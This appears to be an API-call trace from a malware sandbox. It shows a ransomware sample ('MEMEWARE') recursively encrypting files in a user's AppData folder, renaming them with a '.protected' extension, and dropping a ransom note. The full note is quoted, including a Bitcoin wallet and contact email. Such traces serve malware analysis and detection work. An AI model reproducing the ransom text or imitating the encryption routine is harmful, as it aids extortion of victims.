(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.065] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.065] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.065] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0078.065] CloseHandle (hObject=0x14c) returned 1 [0078.066] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="Windows") returned -1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="Program Files") returned -1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="Program Files (x86)") returned -1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="$Recycle.bin") returned 1 [0078.066] lstrcmpiW (lpString1="DQQ19BCJ.JAX", lpString2="System Volume Information") returned -1 [0078.066] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX") returned 69 [0078.066] lstrcmpW (lpString1="DQQ19BCJ.JAX", lpString2=".") returned 1 [0078.066] lstrcmpW (lpString1="DQQ19BCJ.JAX", lpString2="..") returned 1 [0078.066] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*") returned 71 [0078.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 
[0078.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.067] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.067] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.067] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.067] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.067] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\.") returned 71 [0078.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.067] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.067] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.067] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.067] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.067] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.067] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\..") returned 72 [0078.067] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.067] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="Windows") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="Program Files") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="Program Files (x86)") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="$Recycle.bin") returned 1 [0078.067] lstrcmpiW (lpString1="YVORLGOR.PNT", lpString2="System 
Volume Information") returned 1 [0078.067] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT") returned 82 [0078.067] lstrcmpW (lpString1="YVORLGOR.PNT", lpString2=".") returned 1 [0078.067] lstrcmpW (lpString1="YVORLGOR.PNT", lpString2="..") returned 1 [0078.068] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*") returned 84 [0078.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.076] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.076] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.076] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.076] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.076] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.076] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\.") returned 84 [0078.076] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.076] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.076] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.076] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.076] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.076] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.076] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.076] wnsprintfW (in: 
pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\..") returned 85 [0078.076] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.076] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.076] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="Windows") returned -1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="Program Files") returned -1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="Program Files (x86)") returned -1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="$Recycle.bin") returned 1 [0078.076] lstrcmpiW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="System Volume Information") returned -1 [0078.076] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715") returned 142 [0078.076] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2=".") returned 1 [0078.076] lstrcmpW (lpString1="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715", lpString2="..") returned 1 [0078.076] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*") returned 144 [0078.076] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.077] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.077] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.077] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.077] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\.") returned 144 [0078.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.077] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.077] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.077] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.077] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.077] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.077] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.077] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\..") returned 145 [0078.077] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.078] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.078] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.078] lstrcmpiW 
(lpString1="GoogleUpdateSetup.exe", lpString2="Windows") returned -1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files") returned -1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files (x86)") returned -1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="$Recycle.bin") returned 1 [0078.078] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="System Volume Information") returned -1 [0078.078] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrIW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".protected") returned 0x0 [0078.078] lstrcmpW (lpString1="GoogleUpdateSetup.exe", lpString2="RESTORE_FILES.txt") returned -1 [0078.078] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.078] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".txt") returned 0x0 [0078.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".rar") returned 0x0 [0078.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe") returned 164 [0078.078] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".zip") returned 0x0 [0078.078] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.096] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.096] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.096] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.113] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.113] CloseHandle (hObject=0x158) returned 1 [0078.113] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.protected") returned 174 [0078.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\GoogleUpdateSetup.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\googleupdatesetup.exe.protected")) returned 1 [0078.113] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.113] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.113] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\RESTORE_FILES.txt") returned 160 [0078.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.125] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.125] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, 
lpOverlapped=0x0) returned 1 [0078.126] lstrlenA (lpString="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") returned 684 [0078.126] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.126] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.126] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.126] CloseHandle (hObject=0x154) returned 1 [0078.127] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Windows") returned -1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files") returned -1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files (x86)") returned -1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="$Recycle.bin") returned 1 [0078.127] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="System Volume Information") returned -1 [0078.127] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned 137 [0078.127] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", 
lpString2=".") returned 1 [0078.127] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="..") returned 1 [0078.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*") returned 139 [0078.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\.") returned 139 [0078.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.129] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.129] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.129] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.129] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.129] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\..") returned 140 [0078.129] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.129] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="Windows") returned -1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="Program Files") returned -1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="Program Files (x86)") returned -1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="$Recycle.bin") returned 1 [0078.130] lstrcmpiW (lpString1="clickonce_bootstrap.exe", lpString2="System Volume Information") returned -1 [0078.130] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0078.130] StrStrIW (lpFirst="clickonce_bootstrap.exe", lpSrch=".protected") returned 0x0 [0078.130] lstrcmpW (lpString1="clickonce_bootstrap.exe", lpString2="RESTORE_FILES.txt") returned -1 [0078.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js 
